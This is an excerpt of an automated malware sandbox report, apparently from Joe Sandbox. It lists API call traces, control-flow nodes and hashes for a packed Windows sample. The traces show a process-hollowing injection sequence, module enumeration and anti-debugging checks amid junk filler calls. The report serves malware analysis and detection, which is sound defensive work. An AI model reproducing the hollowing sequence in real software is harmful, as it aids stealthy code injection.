                • Opcode Fuzzy Hash: 3360a2277858194782dde3c7c085f57b235e4587718fe2da1788c104c9dc8348
                • Instruction Fuzzy Hash: 0F020FB6609380CFD2748F6AC985B8EF7E0BB85710F50891DEAC95B660DB308885CF57

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 023E0156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 023E016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 023E0255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 023E0270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023E0283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 023E029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023E02C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023E02E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 023E0304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 023E032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 023E0399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023E03BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023E03E1
                • ResumeThread.KERNELBASE(00000000), ref: 023E03ED
                • ExitProcess.KERNEL32(00000000), ref: 023E0412
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: f39ecf4becc3865d5f7949430554dc521036756f73cf316e0ca2e687c56f4be9
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: 30B1D674A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB391D771AE45CF94

                Control-flow Graph

                APIs
                • SetLastError.KERNEL32(00000000), ref: 00403920
                • GetCurrentProcess.KERNEL32 ref: 00403926
                • GetCharWidthFloatA.GDI32(00000000,00000000,00000000,00000000), ref: 00403938
                • GetBitmapBits.GDI32(00000000,00000000,00000000), ref: 00403940
                • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 0040394E
                • GetMenuStringA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0040397F
                • LoadMenuW.USER32(00000000,00000000), ref: 00403989
                • CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 00403997
                • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004039AA
                • EnumResourceNamesA.KERNEL32(00000000,jaxerizulowesecuxod jokuxuvow puzuwi tenovavagizebeda xidejum,00000000,00000000), ref: 004039BB
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004039C7
                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00403A1D
                • VirtualProtect.KERNELBASE(00000000,?,00000040,?), ref: 00403A36
                • LoadMenuW.USER32(00000000,00000000), ref: 00403A54
                • CharUpperW.USER32(00000000), ref: 00403A58
                • GetTickCount.KERNEL32 ref: 00403A5A
                • GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403AA1
                • SetConsoleCP.KERNEL32(00000000), ref: 00403AA5
                • LoadLibraryW.KERNEL32(00000000), ref: 00403AA9
                • PeekConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00403ABB
                • WaitForDebugEvent.KERNEL32(00000000,00000000), ref: 00403AC5
                • LCMapStringW.KERNEL32(00000000,00000000,cav,00000000,?,00000000), ref: 00403B06
                • SetEnvironmentVariableW.KERNEL32(00000000,00000000), ref: 00403B0C
                • OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00403B14
                • SetLastError.KERNEL32(00000000), ref: 00403B31
                • GetFileAttributesA.KERNEL32(00000000), ref: 00403B7F
                • GetShortPathNameW.KERNEL32(Nizapason,?,00000000), ref: 00403B8F
                • GlobalWire.KERNEL32(00000000), ref: 00403B93
                • GetThreadPriorityBoost.KERNEL32(00000000,00000000), ref: 00403B99
                • SetDefaultCommConfigW.KERNEL32(00000000,00000000,00000000), ref: 00403BA5
                • GetSystemWindowsDirectoryA.KERNEL32(?,00000000), ref: 00403BB4
                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00403BCB
                • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00403BDB
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Load$CharMenu$ConsoleCreateErrorEventExchangeFileGlobalInterlockedLastLibraryString$AllocAttributesBitmapBitsBoostCommCompareConfigCountCurrentDebugDefaultDirectoryDiskEnumEnvironmentFloatFreeInputMappingNameNamesOpenPathPeekPriorityProcessProtectResourceShortSpaceSystemThreadTickUpperVariableVirtualWaitWidthWidth32WindowsWire
                • String ID: Bq $Nizapason$cav$jaxerizulowesecuxod jokuxuvow puzuwi tenovavagizebeda xidejum$msimg32.dll${
                • API String ID: 674057593-1484726657
                • Opcode ID: dbc354f09cd41c6bee0e0047f39ef207380ce46c76c95511c2d14119976b53de
                • Instruction ID: ac32dcd3d69ca1a597d245470bb96842fbd3d1720af05dafb389192bec6efd49
                • Opcode Fuzzy Hash: dbc354f09cd41c6bee0e0047f39ef207380ce46c76c95511c2d14119976b53de
                • Instruction Fuzzy Hash: A981D235A84340BFE710AFA1DD4AF997B78AB44B06F104035F749BB5F1CAB469808B6D

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 87 23e0420-23e04f8 89 23e04ff-23e053c CreateWindowExA 87->89 90 23e04fa 87->90 92 23e053e 89->92 93 23e0540-23e0558 PostMessageA 89->93 91 23e05aa-23e05ad 90->91 92->91 94 23e055f-23e0563 93->94 94->91 95 23e0565-23e0579 94->95 95->91 97 23e057b-23e0582 95->97 98 23e05a8 97->98 99 23e0584-23e0588 97->99 98->94 99->98 100 23e058a-23e0591 99->100 100->98 101 23e0593-23e0597 call 23e0110 100->101 103 23e059c-23e05a5 101->103 103->98
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 023E0533
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: 452901bb175bc60f00bd1610a6e677fb2c5d9b738c5525b5a6f0f5992ad40d40
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 57510470908388DAEF15CBA8C849BADBBB6AF11708F144058D5497F2C6C3FA5658CB62

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 104 23e05b0-23e05d5 105 23e05dc-23e05e0 104->105 106 23e061e-23e0621 105->106 107 23e05e2-23e05f5 GetFileAttributesA 105->107 108 23e05f7-23e05fe 107->108 109 23e0613-23e061c 107->109 108->109 110 23e0600-23e060b call 23e0420 108->110 109->105 112 23e0610 110->112 112->109
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023E05EC
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: ffbeb807d8126537c3d8b775056429449f6b02d469e2608e0542264cea94c5b9
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 2B0121B0C0425CEEDF15DB98C5183AEBFB5AF41308F1480D9C4593B282D7B69B58CBA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 113 233f7c6-233f7df 114 233f7e1-233f7e3 113->114 115 233f7e5 114->115 116 233f7ea-233f7f6 CreateToolhelp32Snapshot 114->116 115->116 117 233f806-233f813 Module32First 116->117 118 233f7f8-233f7fe 116->118 119 233f815-233f816 call 233f485 117->119 120 233f81c-233f824 117->120 118->117 123 233f800-233f804 118->123 124 233f81b 119->124 123->114 123->117 124->120
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0233F7EE
                • Module32First.KERNEL32(00000000,00000224), ref: 0233F80E
                Memory Dump Source
                • Source File: 00000005.00000002.1261344737.000000000233F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0233F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_233f000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: 9244c74022c4270166e4f960e136bc6fdb7a42f606f9c834b5f9ca29ba31c4b8
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 31F0F631A003117FD7213FF4A88DB6E76E8BF49629FA00229E642D58C0CB70E9454A60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 126 233f485-233f4bf call 233f798 129 233f4c1-233f4f4 VirtualAlloc call 233f512 126->129 130 233f50d 126->130 132 233f4f9-233f50b 129->132 130->130 132->130
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0233F4D6
                Memory Dump Source
                • Source File: 00000005.00000002.1261344737.000000000233F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0233F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_233f000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: c2188eb126d5c43078843c23df9e2acf7ea8cd792cba4efaba0f4226d0c7eb06
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 61113C79A00208EFDB01DF98C985E99BBF5AF08350F458094F9489B361D775EA90DF80

                Control-flow Graph

                APIs
                • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040364F
                • CreateJobObjectW.KERNEL32(00000000,werokatanesibulowo), ref: 0040365B
                • GetConsoleAliasExesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 0040366A
                • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403673
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403681
                • GetProcessVersion.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403688
                • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00403690
                • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403698
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004036A4
                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004036AB
                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 004036B4
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Create$FileInfo$CalendarCommEnumFormatNameNumberProcessVersion$AliasConfigConsoleDateDialogDriveExesFormatsHardLibraryLinkLoadLogicalModuleMountNamedObjectParametersPathPipePointShortShutdownStateStringsTempUnlockVerifyVolume_memset
                • String ID: $Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya$werokatanesibulowo
                • API String ID: 3661458681-1693462513
                • Opcode ID: eeb5ed0d94c8fed7e54892a73c06fda7e278159d2a01c58d13d1c183c16f05e9
                • Instruction ID: d0a06b94d87111463b208d9b00102714d4cc8daabb5631183cdad218cb79e479
                • Opcode Fuzzy Hash: eeb5ed0d94c8fed7e54892a73c06fda7e278159d2a01c58d13d1c183c16f05e9
                • Instruction Fuzzy Hash: E8817C75506260AFC320DF55DE4899FBFE8FF8A751F00442EF589A3260C7349A45CBAA

                Control-flow Graph

                APIs
                • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040364F
                • CreateJobObjectW.KERNEL32(00000000,werokatanesibulowo), ref: 0040365B
                • GetConsoleAliasExesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 0040366A
                • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403673
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403681
                • GetProcessVersion.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403688
                • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00403690
                • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403698
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004036A4
                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004036AB
                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 004036B4
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Create$FileInfo$CalendarCommEnumFormatNameNumberProcessVersion$AliasConfigConsoleDateDialogDriveExesFormatsHardLibraryLinkLoadLogicalModuleMountNamedObjectParametersPathPipePointShortShutdownStateStringsTempUnlockVerifyVolume_memset
                • String ID: $Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya$werokatanesibulowo
                • API String ID: 3661458681-1693462513
                • Opcode ID: 9654d4f228e0ba4d77ab0b8fe357454f8465955ccc391f4c74cc3bca01d7bed0
                • Instruction ID: f68eb26a0aed4cdc4c15122984545acf650f0f240818527a75695e4f3843e8d9
                • Opcode Fuzzy Hash: 9654d4f228e0ba4d77ab0b8fe357454f8465955ccc391f4c74cc3bca01d7bed0
                • Instruction Fuzzy Hash: B9715A71406260AFD320CF65DE48A9FBFE8FF8A751F00442DF589A3260D7349645CBAA

                Control-flow Graph

                APIs
                • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040364F
                • CreateJobObjectW.KERNEL32(00000000,werokatanesibulowo), ref: 0040365B
                • GetConsoleAliasExesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 0040366A
                • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403673
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403681
                • GetProcessVersion.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403688
                • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00403690
                • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403698
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004036A4
                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004036AB
                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 004036B4
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Create$FileInfo$CalendarCommEnumFormatNameNumberProcessVersion$AliasConfigConsoleDateDialogDriveExesFormatsHardLibraryLinkLoadLogicalModuleMountNamedObjectParametersPathPipePointShortShutdownStateStringsTempUnlockVerifyVolume_memset
                • String ID: $Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya$werokatanesibulowo
                • API String ID: 3661458681-1693462513
                • Opcode ID: 8cbbe8aad74cd2ab5445bf0f3a8bece14ad594e5198c0319760abc936fd5aff9
                • Instruction ID: 53ad46d36bff19742a9320b0afe7630b043df2f11a08ffcc62ad2f013a45b4bc
                • Opcode Fuzzy Hash: 8cbbe8aad74cd2ab5445bf0f3a8bece14ad594e5198c0319760abc936fd5aff9
                • Instruction Fuzzy Hash: 9E715A71406260AFD310CF65DE48A9FBFE8FF8A751F00442DF589A3260D7349645CBAA
                APIs
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 0040383D
                • ReadConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040385A
                • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00403862
                • GetConsoleAliasExesLengthW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403892
                • CreateEventW.KERNEL32(00000000,00000000,00000000,Fidowivologobe), ref: 004038A3
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: CreateInfo$CommConsoleMountPointVolume$AliasCalendarConfigDialogDriveEnumEventExesFileFormatHardInputLengthLinkLocaleLogicalNumberPathReadStateStringsTempUnlockVerifyVersion_memset
                • String ID: Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya
                • API String ID: 3302057559-615381572
                • Opcode ID: c8fd9daa9a024cd56d6b54a367a5d9827efae000f0fb5ba90e3cc3d3b541e272
                • Instruction ID: 12ceed9113a581727385d43aaad1376cfeeea892591a91eee3089c40789bf332
                • Opcode Fuzzy Hash: c8fd9daa9a024cd56d6b54a367a5d9827efae000f0fb5ba90e3cc3d3b541e272
                • Instruction Fuzzy Hash: 81516D71505350AFD310CF65DD48A9FBFE8EF89751F00882EF589A3260D7349A45CBAA
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00409A37
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409A4C
                • UnhandledExceptionFilter.KERNEL32(00402B5C), ref: 00409A57
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00409A73
                • TerminateProcess.KERNEL32(00000000), ref: 00409A7A
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: c300b549e13fec5c31b588df8ad9cbc436bab0dcc87fd90aca7c005ea68984da
                • Instruction ID: c0321ec8be0c87656a769b50352e65d88f03d911ecbf24befd87e90af00fa050
                • Opcode Fuzzy Hash: c300b549e13fec5c31b588df8ad9cbc436bab0dcc87fd90aca7c005ea68984da
                • Instruction Fuzzy Hash: E321E3B4905344DFDB58DF69EA496443BB4FB48300F1042BAE509A77B0E7B659A1CF0E
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00404CC7), ref: 00405AD2
                • __mtterm.LIBCMT ref: 00405ADE
                  • Part of subcall function 00405817: DecodePointer.KERNEL32(00000004,00405C40,?,00404CC7), ref: 00405828
                  • Part of subcall function 00405817: TlsFree.KERNEL32(00000002,00405C40,?,00404CC7), ref: 00405842
                  • Part of subcall function 00405817: DeleteCriticalSection.KERNEL32(00000000,00000000,77755810,?,00405C40,?,00404CC7), ref: 0040690C
                  • Part of subcall function 00405817: _free.LIBCMT ref: 0040690F
                  • Part of subcall function 00405817: DeleteCriticalSection.KERNEL32(00000002,77755810,?,00405C40,?,00404CC7), ref: 00406936
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405AF4
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405B01
